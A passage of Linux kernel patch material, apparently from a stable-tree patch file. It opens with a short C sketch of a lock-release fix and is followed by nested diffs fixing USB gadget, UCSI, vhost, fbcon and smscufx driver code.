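__ffs_ep0_queue_wait() is entered with ffs->ev.waitq.lock held and is expected to drop it; the bug was an early return that left the lock held on the -EINVAL path. The invariant: every exit from a function that consumes a lock must release it, as in this sketch (stand-in names; compile with -pthread):

#include <errno.h>
#include <pthread.h>
#include <stdio.h>

static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

/* Called with `lock` held; must release it on EVERY return path. */
static int queue_wait(int have_request)
{
	if (!have_request) {
		pthread_mutex_unlock(&lock);	/* the unlock the fix adds */
		return -EINVAL;
	}

	pthread_mutex_unlock(&lock);
	puts("request queued");
	return 0;
}

int main(void)
{
	pthread_mutex_lock(&lock);
	queue_wait(0);			/* error path now balances the lock */

	pthread_mutex_lock(&lock);	/* would deadlock before the fix */
	pthread_mutex_unlock(&lock);
	return 0;
}
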
+diff --git a/drivers/usb/gadget/function/f_uac2.c b/drivers/usb/gadget/function/f_uac2.c
+index 08726e4c68a56..0219cd79493a7 100644
+--- a/drivers/usb/gadget/function/f_uac2.c
++++ b/drivers/usb/gadget/function/f_uac2.c
+@@ -1142,6 +1142,7 @@ afunc_bind(struct usb_configuration *cfg, struct usb_function *fn)
+ 		}
+ 		std_as_out_if0_desc.bInterfaceNumber = ret;
+ 		std_as_out_if1_desc.bInterfaceNumber = ret;
++		std_as_out_if1_desc.bNumEndpoints = 1;
+ 		uac2->as_out_intf = ret;
+ 		uac2->as_out_alt = 0;
+ 
+diff --git a/drivers/usb/gadget/udc/bcm63xx_udc.c b/drivers/usb/gadget/udc/bcm63xx_udc.c
+index 2cdb07905bdeb..d04d72f5816e6 100644
+--- a/drivers/usb/gadget/udc/bcm63xx_udc.c
++++ b/drivers/usb/gadget/udc/bcm63xx_udc.c
+@@ -1830,7 +1830,6 @@ static int bcm63xx_udc_start(struct usb_gadget *gadget,
+ 	bcm63xx_select_phy_mode(udc, true);
+ 
+ 	udc->driver = driver;
+-	driver->driver.bus = NULL;
+ 	udc->gadget.dev.of_node = udc->dev->of_node;
+ 
+ 	spin_unlock_irqrestore(&udc->lock, flags);
+diff --git a/drivers/usb/gadget/udc/fotg210-udc.c b/drivers/usb/gadget/udc/fotg210-udc.c
+index d0e051beb3af9..693c73e5f61e8 100644
+--- a/drivers/usb/gadget/udc/fotg210-udc.c
++++ b/drivers/usb/gadget/udc/fotg210-udc.c
+@@ -1009,7 +1009,6 @@ static int fotg210_udc_start(struct usb_gadget *g,
+ 	u32 value;
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	fotg210->driver = driver;
+ 
+ 	/* enable device global interrupt */
+diff --git a/drivers/usb/gadget/udc/fsl_qe_udc.c b/drivers/usb/gadget/udc/fsl_qe_udc.c
+index bf745358e28e6..3b1cc8fa30c83 100644
+--- a/drivers/usb/gadget/udc/fsl_qe_udc.c
++++ b/drivers/usb/gadget/udc/fsl_qe_udc.c
+@@ -2285,7 +2285,6 @@ static int fsl_qe_start(struct usb_gadget *gadget,
+ 	/* lock is needed, but it is unclear whether this lock or another should be used */
+ 	spin_lock_irqsave(&udc->lock, flags);
+ 
+-	driver->driver.bus = NULL;
+ 	/* hook up the driver */
+ 	udc->driver = driver;
+ 	udc->gadget.speed = driver->max_speed;
+diff --git a/drivers/usb/gadget/udc/fsl_udc_core.c b/drivers/usb/gadget/udc/fsl_udc_core.c
+index 50435e8041183..a67873a074b7b 100644
+--- a/drivers/usb/gadget/udc/fsl_udc_core.c
++++ b/drivers/usb/gadget/udc/fsl_udc_core.c
+@@ -1943,7 +1943,6 @@ static int fsl_udc_start(struct usb_gadget *g,
+ 	/* lock is needed, but it is unclear whether this lock or another should be used */
+ 	spin_lock_irqsave(&udc_controller->lock, flags);
+ 
+-	driver->driver.bus = NULL;
+ 	/* hook up the driver */
+ 	udc_controller->driver = driver;
+ 	spin_unlock_irqrestore(&udc_controller->lock, flags);
+diff --git a/drivers/usb/gadget/udc/fusb300_udc.c b/drivers/usb/gadget/udc/fusb300_udc.c
+index 9af8b415f303b..5954800d652ca 100644
+--- a/drivers/usb/gadget/udc/fusb300_udc.c
++++ b/drivers/usb/gadget/udc/fusb300_udc.c
+@@ -1311,7 +1311,6 @@ static int fusb300_udc_start(struct usb_gadget *g,
+ 	struct fusb300 *fusb300 = to_fusb300(g);
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	fusb300->driver = driver;
+ 
+ 	return 0;
+diff --git a/drivers/usb/gadget/udc/goku_udc.c b/drivers/usb/gadget/udc/goku_udc.c
+index bdc56b24b5c90..5ffb3d5c635be 100644
+--- a/drivers/usb/gadget/udc/goku_udc.c
++++ b/drivers/usb/gadget/udc/goku_udc.c
+@@ -1375,7 +1375,6 @@ static int goku_udc_start(struct usb_gadget *g,
+ 	struct goku_udc	*dev = to_goku_udc(g);
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/*
+diff --git a/drivers/usb/gadget/udc/gr_udc.c b/drivers/usb/gadget/udc/gr_udc.c
+index 22096f8505de4..85cdc0af3bf95 100644
+--- a/drivers/usb/gadget/udc/gr_udc.c
++++ b/drivers/usb/gadget/udc/gr_udc.c
+@@ -1906,7 +1906,6 @@ static int gr_udc_start(struct usb_gadget *gadget,
+ 	spin_lock(&dev->lock);
+ 
+ 	/* Hook up the driver */
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* Get ready for host detection */
+diff --git a/drivers/usb/gadget/udc/m66592-udc.c b/drivers/usb/gadget/udc/m66592-udc.c
+index 931e6362a13da..d88871e716623 100644
+--- a/drivers/usb/gadget/udc/m66592-udc.c
++++ b/drivers/usb/gadget/udc/m66592-udc.c
+@@ -1454,7 +1454,6 @@ static int m66592_udc_start(struct usb_gadget *g,
+ 	struct m66592 *m66592 = to_m66592(g);
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	m66592->driver = driver;
+ 
+ 	m66592_bset(m66592, M66592_VBSE | M66592_URST, M66592_INTENB0);
+diff --git a/drivers/usb/gadget/udc/max3420_udc.c b/drivers/usb/gadget/udc/max3420_udc.c
+index 3074da00c3df7..ddf0ed3eb4f26 100644
+--- a/drivers/usb/gadget/udc/max3420_udc.c
++++ b/drivers/usb/gadget/udc/max3420_udc.c
+@@ -1108,7 +1108,6 @@ static int max3420_udc_start(struct usb_gadget *gadget,
+ 
+ 	spin_lock_irqsave(&udc->lock, flags);
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	udc->driver = driver;
+ 	udc->gadget.speed = USB_SPEED_FULL;
+ 
+diff --git a/drivers/usb/gadget/udc/mv_u3d_core.c b/drivers/usb/gadget/udc/mv_u3d_core.c
+index 598654a3cb418..411b6179782c1 100644
+--- a/drivers/usb/gadget/udc/mv_u3d_core.c
++++ b/drivers/usb/gadget/udc/mv_u3d_core.c
+@@ -1243,7 +1243,6 @@ static int mv_u3d_start(struct usb_gadget *g,
+ 	}
+ 
+ 	/* hook up the driver ... */
+-	driver->driver.bus = NULL;
+ 	u3d->driver = driver;
+ 
+ 	u3d->ep0_dir = USB_DIR_OUT;
+diff --git a/drivers/usb/gadget/udc/mv_udc_core.c b/drivers/usb/gadget/udc/mv_udc_core.c
+index fdb17d86cd656..b397f3a848cf7 100644
+--- a/drivers/usb/gadget/udc/mv_udc_core.c
++++ b/drivers/usb/gadget/udc/mv_udc_core.c
+@@ -1359,7 +1359,6 @@ static int mv_udc_start(struct usb_gadget *gadget,
+ 	spin_lock_irqsave(&udc->lock, flags);
+ 
+ 	/* hook up the driver ... */
+-	driver->driver.bus = NULL;
+ 	udc->driver = driver;
+ 
+ 	udc->usb_state = USB_STATE_ATTACHED;
+diff --git a/drivers/usb/gadget/udc/net2272.c b/drivers/usb/gadget/udc/net2272.c
+index 84605a4d0715f..538c1b9a28835 100644
+--- a/drivers/usb/gadget/udc/net2272.c
++++ b/drivers/usb/gadget/udc/net2272.c
+@@ -1451,7 +1451,6 @@ static int net2272_start(struct usb_gadget *_gadget,
+ 		dev->ep[i].irqs = 0;
+ 	/* hook up the driver ... */
+ 	dev->softconnect = 1;
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* ... then enable host detection and ep0; and we're ready
+diff --git a/drivers/usb/gadget/udc/net2280.c b/drivers/usb/gadget/udc/net2280.c
+index d6a68631354a2..1b929c519cd71 100644
+--- a/drivers/usb/gadget/udc/net2280.c
++++ b/drivers/usb/gadget/udc/net2280.c
+@@ -2423,7 +2423,6 @@ static int net2280_start(struct usb_gadget *_gadget,
+ 		dev->ep[i].irqs = 0;
+ 
+ 	/* hook up the driver ... */
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	retval = device_create_file(&dev->pdev->dev, &dev_attr_function);
+diff --git a/drivers/usb/gadget/udc/omap_udc.c b/drivers/usb/gadget/udc/omap_udc.c
+index bea346e362b2b..f660ebfa13799 100644
+--- a/drivers/usb/gadget/udc/omap_udc.c
++++ b/drivers/usb/gadget/udc/omap_udc.c
+@@ -2066,7 +2066,6 @@ static int omap_udc_start(struct usb_gadget *g,
+ 	udc->softconnect = 1;
+ 
+ 	/* hook up the driver */
+-	driver->driver.bus = NULL;
+ 	udc->driver = driver;
+ 	spin_unlock_irqrestore(&udc->lock, flags);
+ 
+diff --git a/drivers/usb/gadget/udc/pch_udc.c b/drivers/usb/gadget/udc/pch_udc.c
+index 9bb7a9d7a2fb2..4f8617210d852 100644
+--- a/drivers/usb/gadget/udc/pch_udc.c
++++ b/drivers/usb/gadget/udc/pch_udc.c
+@@ -2908,7 +2908,6 @@ static int pch_udc_start(struct usb_gadget *g,
+ {
+ 	struct pch_udc_dev	*dev = to_pch_udc(g);
+ 
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* get ready for ep0 traffic */
+diff --git a/drivers/usb/gadget/udc/snps_udc_core.c b/drivers/usb/gadget/udc/snps_udc_core.c
+index 52ea4dcf6a927..2fc5d4d277bc4 100644
+--- a/drivers/usb/gadget/udc/snps_udc_core.c
++++ b/drivers/usb/gadget/udc/snps_udc_core.c
+@@ -1933,7 +1933,6 @@ static int amd5536_udc_start(struct usb_gadget *g,
+ 	struct udc *dev = to_amd5536_udc(g);
+ 	u32 tmp;
+ 
+-	driver->driver.bus = NULL;
+ 	dev->driver = driver;
+ 
+ 	/* Some gadget drivers use both ep0 directions.
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index 1292241d581a6..1cf8947c6d661 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -1269,6 +1269,9 @@ err_unregister:
+ 		con->port = NULL;
+ 	}
+ 
++	kfree(ucsi->connector);
++	ucsi->connector = NULL;
++
+ err_reset:
+ 	memset(&ucsi->cap, 0, sizeof(ucsi->cap));
+ 	ucsi_reset_ppm(ucsi);
+@@ -1300,7 +1303,8 @@ static void ucsi_resume_work(struct work_struct *work)
+ 
+ int ucsi_resume(struct ucsi *ucsi)
+ {
+-	queue_work(system_long_wq, &ucsi->resume_work);
++	if (ucsi->connector)
++		queue_work(system_long_wq, &ucsi->resume_work);
+ 	return 0;
+ }
+ EXPORT_SYMBOL_GPL(ucsi_resume);
+@@ -1420,6 +1424,9 @@ void ucsi_unregister(struct ucsi *ucsi)
+ 	/* Disable notifications */
+ 	ucsi->ops->async_write(ucsi, UCSI_CONTROL, &cmd, sizeof(cmd));
+ 
++	if (!ucsi->connector)
++		return;
++
+ 	for (i = 0; i < ucsi->cap.num_connectors; i++) {
+ 		cancel_work_sync(&ucsi->connector[i].work);
+ 		ucsi_unregister_partner(&ucsi->connector[i]);
+diff --git a/drivers/usb/usbip/usbip_common.c b/drivers/usb/usbip/usbip_common.c
+index 053a2bca4c475..f8b326eed54dc 100644
+--- a/drivers/usb/usbip/usbip_common.c
++++ b/drivers/usb/usbip/usbip_common.c
+@@ -309,7 +309,7 @@ int usbip_recv(struct socket *sock, void *buf, int size)
+ 	if (!sock || !buf || !size)
+ 		return -EINVAL;
+ 
+-	iov_iter_kvec(&msg.msg_iter, READ, &iov, 1, size);
++	iov_iter_kvec(&msg.msg_iter, ITER_DEST, &iov, 1, size);
+ 
+ 	usbip_dbg_xmit("enter\n");
+ 
+diff --git a/drivers/vhost/net.c b/drivers/vhost/net.c
+index 20265393aee7c..4c538b30fd76d 100644
+--- a/drivers/vhost/net.c
++++ b/drivers/vhost/net.c
+@@ -611,7 +611,7 @@ static size_t init_iov_iter(struct vhost_virtqueue *vq, struct iov_iter *iter,
+ 	/* Skip header. TODO: support TSO. */
+ 	size_t len = iov_length(vq->iov, out);
+ 
+-	iov_iter_init(iter, WRITE, vq->iov, out, len);
++	iov_iter_init(iter, ITER_SOURCE, vq->iov, out, len);
+ 	iov_iter_advance(iter, hdr_size);
+ 
+ 	return iov_iter_count(iter);
+@@ -1184,14 +1184,14 @@ static void handle_rx(struct vhost_net *net)
+ 			msg.msg_control = vhost_net_buf_consume(&nvq->rxq);
+ 		/* On overrun, truncate and discard */
+ 		if (unlikely(headcount > UIO_MAXIOV)) {
+-			iov_iter_init(&msg.msg_iter, READ, vq->iov, 1, 1);
++			iov_iter_init(&msg.msg_iter, ITER_DEST, vq->iov, 1, 1);
+ 			err = sock->ops->recvmsg(sock, &msg,
+ 						 1, MSG_DONTWAIT | MSG_TRUNC);
+ 			pr_debug("Discarded rx packet: len %zd\n", sock_len);
+ 			continue;
+ 		}
+ 		/* We don't need to be notified again. */
+-		iov_iter_init(&msg.msg_iter, READ, vq->iov, in, vhost_len);
++		iov_iter_init(&msg.msg_iter, ITER_DEST, vq->iov, in, vhost_len);
+ 		fixup = msg.msg_iter;
+ 		if (unlikely((vhost_hlen))) {
+ 			/* We will supply the header ourselves
+@@ -1511,6 +1511,9 @@ static long vhost_net_set_backend(struct vhost_net *n, unsigned index, int fd)
+ 	nvq = &n->vqs[index];
+ 	mutex_lock(&vq->mutex);
+ 
++	if (fd == -1)
++		vhost_clear_msg(&n->dev);
++
+ 	/* Verify that ring has been setup correctly. */
+ 	if (!vhost_vq_access_ok(vq)) {
+ 		r = -EFAULT;
+diff --git a/drivers/vhost/scsi.c b/drivers/vhost/scsi.c
+index 7ebf106d50c15..d5ecb8876fc9a 100644
+--- a/drivers/vhost/scsi.c
++++ b/drivers/vhost/scsi.c
+@@ -80,7 +80,7 @@ struct vhost_scsi_cmd {
+ 	struct scatterlist *tvc_prot_sgl;
+ 	struct page **tvc_upages;
+ 	/* Pointer to response header iovec */
+-	struct iovec tvc_resp_iov;
++	struct iovec *tvc_resp_iov;
+ 	/* Pointer to vhost_scsi for our device */
+ 	struct vhost_scsi *tvc_vhost;
+ 	/* Pointer to vhost_virtqueue for the cmd */
+@@ -563,7 +563,7 @@ static void vhost_scsi_complete_cmd_work(struct vhost_work *work)
+ 		memcpy(v_rsp.sense, cmd->tvc_sense_buf,
+ 		       se_cmd->scsi_sense_length);
+ 
+-		iov_iter_init(&iov_iter, READ, &cmd->tvc_resp_iov,
++		iov_iter_init(&iov_iter, ITER_DEST, cmd->tvc_resp_iov,
+ 			      cmd->tvc_in_iovs, sizeof(v_rsp));
+ 		ret = copy_to_iter(&v_rsp, sizeof(v_rsp), &iov_iter);
+ 		if (likely(ret == sizeof(v_rsp))) {
+@@ -594,6 +594,7 @@ vhost_scsi_get_cmd(struct vhost_virtqueue *vq, struct vhost_scsi_tpg *tpg,
+ 	struct vhost_scsi_cmd *cmd;
+ 	struct vhost_scsi_nexus *tv_nexus;
+ 	struct scatterlist *sg, *prot_sg;
++	struct iovec *tvc_resp_iov;
+ 	struct page **pages;
+ 	int tag;
+ 
+@@ -613,6 +614,7 @@ vhost_scsi_get_cmd(struct vhost_virtqueue *vq, struct vhost_scsi_tpg *tpg,
+ 	sg = cmd->tvc_sgl;
+ 	prot_sg = cmd->tvc_prot_sgl;
+ 	pages = cmd->tvc_upages;
++	tvc_resp_iov = cmd->tvc_resp_iov;
+ 	memset(cmd, 0, sizeof(*cmd));
+ 	cmd->tvc_sgl = sg;
+ 	cmd->tvc_prot_sgl = prot_sg;
+@@ -625,6 +627,7 @@ vhost_scsi_get_cmd(struct vhost_virtqueue *vq, struct vhost_scsi_tpg *tpg,
+ 	cmd->tvc_data_direction = data_direction;
+ 	cmd->tvc_nexus = tv_nexus;
+ 	cmd->inflight = vhost_scsi_get_inflight(vq);
++	cmd->tvc_resp_iov = tvc_resp_iov;
+ 
+ 	memcpy(cmd->tvc_cdb, cdb, VHOST_SCSI_MAX_CDB_SIZE);
+ 
+@@ -864,7 +867,7 @@ vhost_scsi_get_desc(struct vhost_scsi *vs, struct vhost_virtqueue *vq,
+ 	 * point at the start of the outgoing WRITE payload, if
+ 	 * DMA_TO_DEVICE is set.
+ 	 */
+-	iov_iter_init(&vc->out_iter, WRITE, vq->iov, vc->out, vc->out_size);
++	iov_iter_init(&vc->out_iter, ITER_SOURCE, vq->iov, vc->out, vc->out_size);
+ 	ret = 0;
+ 
+ done:
+@@ -935,7 +938,7 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq)
+ 	struct iov_iter in_iter, prot_iter, data_iter;
+ 	u64 tag;
+ 	u32 exp_data_len, data_direction;
+-	int ret, prot_bytes, c = 0;
++	int ret, prot_bytes, i, c = 0;
+ 	u16 lun;
+ 	u8 task_attr;
+ 	bool t10_pi = vhost_has_feature(vq, VIRTIO_SCSI_F_T10_PI);
+@@ -1016,7 +1019,7 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq)
+ 			data_direction = DMA_FROM_DEVICE;
+ 			exp_data_len = vc.in_size - vc.rsp_size;
+ 
+-			iov_iter_init(&in_iter, READ, &vq->iov[vc.out], vc.in,
++			iov_iter_init(&in_iter, ITER_DEST, &vq->iov[vc.out], vc.in,
+ 				      vc.rsp_size + exp_data_len);
+ 			iov_iter_advance(&in_iter, vc.rsp_size);
+ 			data_iter = in_iter;
+@@ -1092,7 +1095,8 @@ vhost_scsi_handle_vq(struct vhost_scsi *vs, struct vhost_virtqueue *vq)
+ 		}
+ 		cmd->tvc_vhost = vs;
+ 		cmd->tvc_vq = vq;
+-		cmd->tvc_resp_iov = vq->iov[vc.out];
++		for (i = 0; i < vc.in ; i++)
++			cmd->tvc_resp_iov[i] = vq->iov[vc.out + i];
+ 		cmd->tvc_in_iovs = vc.in;
+ 
+ 		pr_debug("vhost_scsi got command opcode: %#02x, lun: %d\n",
+@@ -1146,7 +1150,7 @@ vhost_scsi_send_tmf_resp(struct vhost_scsi *vs, struct vhost_virtqueue *vq,
+ 	memset(&rsp, 0, sizeof(rsp));
+ 	rsp.response = tmf_resp_code;
+ 
+-	iov_iter_init(&iov_iter, READ, resp_iov, in_iovs, sizeof(rsp));
++	iov_iter_init(&iov_iter, ITER_DEST, resp_iov, in_iovs, sizeof(rsp));
+ 
+ 	ret = copy_to_iter(&rsp, sizeof(rsp), &iov_iter);
+ 	if (likely(ret == sizeof(rsp)))
+@@ -1238,7 +1242,7 @@ vhost_scsi_send_an_resp(struct vhost_scsi *vs,
+ 	memset(&rsp, 0, sizeof(rsp));	/* event_actual = 0 */
+ 	rsp.response = VIRTIO_SCSI_S_OK;
+ 
+-	iov_iter_init(&iov_iter, READ, &vq->iov[vc->out], vc->in, sizeof(rsp));
++	iov_iter_init(&iov_iter, ITER_DEST, &vq->iov[vc->out], vc->in, sizeof(rsp));
+ 
+ 	ret = copy_to_iter(&rsp, sizeof(rsp), &iov_iter);
+ 	if (likely(ret == sizeof(rsp)))
+@@ -1461,6 +1465,7 @@ static void vhost_scsi_destroy_vq_cmds(struct vhost_virtqueue *vq)
+ 		kfree(tv_cmd->tvc_sgl);
+ 		kfree(tv_cmd->tvc_prot_sgl);
+ 		kfree(tv_cmd->tvc_upages);
++		kfree(tv_cmd->tvc_resp_iov);
+ 	}
+ 
+ 	sbitmap_free(&svq->scsi_tags);
+@@ -1508,6 +1513,14 @@ static int vhost_scsi_setup_vq_cmds(struct vhost_virtqueue *vq, int max_cmds)
+ 			goto out;
+ 		}
+ 
++		tv_cmd->tvc_resp_iov = kcalloc(UIO_MAXIOV,
++					       sizeof(struct iovec),
++					       GFP_KERNEL);
++		if (!tv_cmd->tvc_resp_iov) {
++			pr_err("Unable to allocate tv_cmd->tvc_resp_iov\n");
++			goto out;
++		}
++
+ 		tv_cmd->tvc_prot_sgl = kcalloc(VHOST_SCSI_PREALLOC_PROT_SGLS,
+ 					       sizeof(struct scatterlist),
+ 					       GFP_KERNEL);
+diff --git a/drivers/vhost/vhost.c b/drivers/vhost/vhost.c
+index 3c2359570df9d..43c9770b86e5a 100644
+--- a/drivers/vhost/vhost.c
++++ b/drivers/vhost/vhost.c
+@@ -661,7 +661,7 @@ void vhost_dev_stop(struct vhost_dev *dev)
+ }
+ EXPORT_SYMBOL_GPL(vhost_dev_stop);
+ 
+-static void vhost_clear_msg(struct vhost_dev *dev)
++void vhost_clear_msg(struct vhost_dev *dev)
+ {
+ 	struct vhost_msg_node *node, *n;
+ 
+@@ -679,6 +679,7 @@ static void vhost_clear_msg(struct vhost_dev *dev)
+ 
+ 	spin_unlock(&dev->iotlb_lock);
+ }
++EXPORT_SYMBOL_GPL(vhost_clear_msg);
+ 
+ void vhost_dev_cleanup(struct vhost_dev *dev)
+ {
+@@ -832,7 +833,7 @@ static int vhost_copy_to_user(struct vhost_virtqueue *vq, void __user *to,
+ 				     VHOST_ACCESS_WO);
+ 		if (ret < 0)
+ 			goto out;
+-		iov_iter_init(&t, WRITE, vq->iotlb_iov, ret, size);
++		iov_iter_init(&t, ITER_DEST, vq->iotlb_iov, ret, size);
+ 		ret = copy_to_iter(from, size, &t);
+ 		if (ret == size)
+ 			ret = 0;
+@@ -871,7 +872,7 @@ static int vhost_copy_from_user(struct vhost_virtqueue *vq, void *to,
+ 			       (unsigned long long) size);
+ 			goto out;
+ 		}
+-		iov_iter_init(&f, READ, vq->iotlb_iov, ret, size);
++		iov_iter_init(&f, ITER_SOURCE, vq->iotlb_iov, ret, size);
+ 		ret = copy_from_iter(to, size, &f);
+ 		if (ret == size)
+ 			ret = 0;
+@@ -2135,7 +2136,7 @@ static int get_indirect(struct vhost_virtqueue *vq,
+ 			vq_err(vq, "Translation failure %d in indirect.\n", ret);
+ 		return ret;
+ 	}
+-	iov_iter_init(&from, READ, vq->indirect, ret, len);
++	iov_iter_init(&from, ITER_SOURCE, vq->indirect, ret, len);
+ 	count = len / sizeof desc;
+ 	/* Buffers are chained via a 16 bit next field, so
+ 	 * we can have at most 2^16 of these. */
+diff --git a/drivers/vhost/vhost.h b/drivers/vhost/vhost.h
+index d9109107af087..790b296271f1e 100644
+--- a/drivers/vhost/vhost.h
++++ b/drivers/vhost/vhost.h
+@@ -181,6 +181,7 @@ long vhost_dev_ioctl(struct vhost_dev *, unsigned int ioctl, void __user *argp);
+ long vhost_vring_ioctl(struct vhost_dev *d, unsigned int ioctl, void __user *argp);
+ bool vhost_vq_access_ok(struct vhost_virtqueue *vq);
+ bool vhost_log_access_ok(struct vhost_dev *);
++void vhost_clear_msg(struct vhost_dev *dev);
+ 
+ int vhost_get_vq_desc(struct vhost_virtqueue *,
+ 		      struct iovec iov[], unsigned int iov_count,
+diff --git a/drivers/vhost/vringh.c b/drivers/vhost/vringh.c
+index 828c293065657..33eb941fcf154 100644
+--- a/drivers/vhost/vringh.c
++++ b/drivers/vhost/vringh.c
+@@ -1161,7 +1161,7 @@ static inline int copy_from_iotlb(const struct vringh *vrh, void *dst,
+ 		else if (ret < 0)
+ 			return ret;
+ 
+-		iov_iter_bvec(&iter, READ, iov, ret, translated);
++		iov_iter_bvec(&iter, ITER_SOURCE, iov, ret, translated);
+ 
+ 		ret = copy_from_iter(dst, translated, &iter);
+ 		if (ret < 0)
+@@ -1194,7 +1194,7 @@ static inline int copy_to_iotlb(const struct vringh *vrh, void *dst,
+ 		else if (ret < 0)
+ 			return ret;
+ 
+-		iov_iter_bvec(&iter, WRITE, iov, ret, translated);
++		iov_iter_bvec(&iter, ITER_DEST, iov, ret, translated);
+ 
+ 		ret = copy_to_iter(src, translated, &iter);
+ 		if (ret < 0)
+diff --git a/drivers/vhost/vsock.c b/drivers/vhost/vsock.c
+index 10a7d23731fef..a2b3743723639 100644
+--- a/drivers/vhost/vsock.c
++++ b/drivers/vhost/vsock.c
+@@ -165,7 +165,7 @@ vhost_transport_do_send_pkt(struct vhost_vsock *vsock,
+ 			break;
+ 		}
+ 
+-		iov_iter_init(&iov_iter, READ, &vq->iov[out], in, iov_len);
++		iov_iter_init(&iov_iter, ITER_DEST, &vq->iov[out], in, iov_len);
+ 		payload_len = pkt->len - pkt->off;
+ 
+ 		/* If the packet is greater than the space available in the
+@@ -371,7 +371,7 @@ vhost_vsock_alloc_pkt(struct vhost_virtqueue *vq,
+ 		return NULL;
+ 
+ 	len = iov_length(vq->iov, out);
+-	iov_iter_init(&iov_iter, WRITE, vq->iov, out, len);
++	iov_iter_init(&iov_iter, ITER_SOURCE, vq->iov, out, len);
+ 
+ 	nbytes = copy_from_iter(&pkt->hdr, sizeof(pkt->hdr), &iov_iter);
+ 	if (nbytes != sizeof(pkt->hdr)) {
+diff --git a/drivers/video/fbdev/core/fbcon.c b/drivers/video/fbdev/core/fbcon.c
+index 14a7d404062c3..1b14c21af2b74 100644
+--- a/drivers/video/fbdev/core/fbcon.c
++++ b/drivers/video/fbdev/core/fbcon.c
+@@ -2495,9 +2495,12 @@ static int fbcon_set_font(struct vc_data *vc, struct console_font *font,
+ 	    h > FBCON_SWAP(info->var.rotate, info->var.yres, info->var.xres))
+ 		return -EINVAL;
+ 
++	if (font->width > 32 || font->height > 32)
++		return -EINVAL;
++
+ 	/* Make sure drawing engine can handle the font */
+-	if (!(info->pixmap.blit_x & (1 << (font->width - 1))) ||
+-	    !(info->pixmap.blit_y & (1 << (font->height - 1))))
++	if (!(info->pixmap.blit_x & BIT(font->width - 1)) ||
++	    !(info->pixmap.blit_y & BIT(font->height - 1)))
+ 		return -EINVAL;
+ 
+ 	/* Make sure driver can handle the font length */
+diff --git a/drivers/video/fbdev/smscufx.c b/drivers/video/fbdev/smscufx.c
+index 9343b7a4ac899..2ad6e98ce10d5 100644
+--- a/drivers/video/fbdev/smscufx.c
++++ b/drivers/video/fbdev/smscufx.c
+@@ -1622,7 +1622,7 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 	struct usb_device *usbdev;
+ 	struct ufx_data *dev;
+ 	struct fb_info *info;
+-	int retval;
++	int retval = -ENOMEM;
+ 	u32 id_rev, fpga_rev;
+ 
+ 	/* usb initialization */
+@@ -1654,15 +1654,17 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 
+ 	if (!ufx_alloc_urb_list(dev, WRITES_IN_FLIGHT, MAX_TRANSFER)) {
+ 		dev_err(dev->gdev, "ufx_alloc_urb_list failed\n");
+-		goto e_nomem;
++		goto put_ref;
+ 	}
+ 
+ 	/* We don't register a new USB class. Our client interface is fbdev */
+ 
+ 	/* allocates framebuffer driver structure, not framebuffer memory */
+ 	info = framebuffer_alloc(0, &usbdev->dev);
+-	if (!info)
+-		goto e_nomem;
++	if (!info) {
++		dev_err(dev->gdev, "framebuffer_alloc failed\n");
++		goto free_urb_list;
++	}
+ 
+ 	dev->info = info;
+ 	info->par = dev;
+@@ -1705,22 +1707,34 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 	check_warn_goto_error(retval, "unable to find common mode for display and adapter");
+ 
+ 	retval = ufx_reg_set_bits(dev, 0x4000, 0x00000001);
+-	check_warn_goto_error(retval, "error %d enabling graphics engine", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d enabling graphics engine", retval);
++		goto setup_modes;
++	}
+ 
+ 	/* ready to begin using device */
+ 	atomic_set(&dev->usb_active, 1);
+ 
+ 	dev_dbg(dev->gdev, "checking var");
+ 	retval = ufx_ops_check_var(&info->var, info);
+-	check_warn_goto_error(retval, "error %d ufx_ops_check_var", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d ufx_ops_check_var", retval);
++		goto reset_active;
++	}
+ 
+ 	dev_dbg(dev->gdev, "setting par");
+ 	retval = ufx_ops_set_par(info);
+-	check_warn_goto_error(retval, "error %d ufx_ops_set_par", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d ufx_ops_set_par", retval);
++		goto reset_active;
++	}
+ 
+ 	dev_dbg(dev->gdev, "registering framebuffer");
+ 	retval = register_framebuffer(info);
+-	check_warn_goto_error(retval, "error %d register_framebuffer", retval);
++	if (retval < 0) {
++		dev_err(dev->gdev, "error %d register_framebuffer", retval);
++		goto reset_active;
++	}
+ 
+ 	dev_info(dev->gdev, "SMSC UDX USB device /dev/fb%d attached. %dx%d resolution."
+ 		" Using %dK framebuffer memory\n", info->node,
+@@ -1728,21 +1742,23 @@ static int ufx_usb_probe(struct usb_interface *interface,
+ 
+ 	return 0;
+ 
+-error:
+-	fb_dealloc_cmap(&info->cmap);
+-destroy_modedb:
++reset_active:
++	atomic_set(&dev->usb_active, 0);
++setup_modes:
+ 	fb_destroy_modedb(info->monspecs.modedb);
+ 	vfree(info->screen_base);
+ 	fb_destroy_modelist(&info->modelist);
++error:
++	fb_dealloc_cmap(&info->cmap);
++destroy_modedb:
+ 	framebuffer_release(info);
++free_urb_list:
++	if (dev->urbs.count > 0)
++		ufx_free_urb_list(dev);
+ put_ref:
+ 	kref_put(&dev->kref, ufx_free); /* ref for framebuffer */
+ 	kref_put(&dev->kref, ufx_free); /* last ref from kref_init */
+ 	return retval;
+-
+-e_nomem:
+-	retval = -ENOMEM;
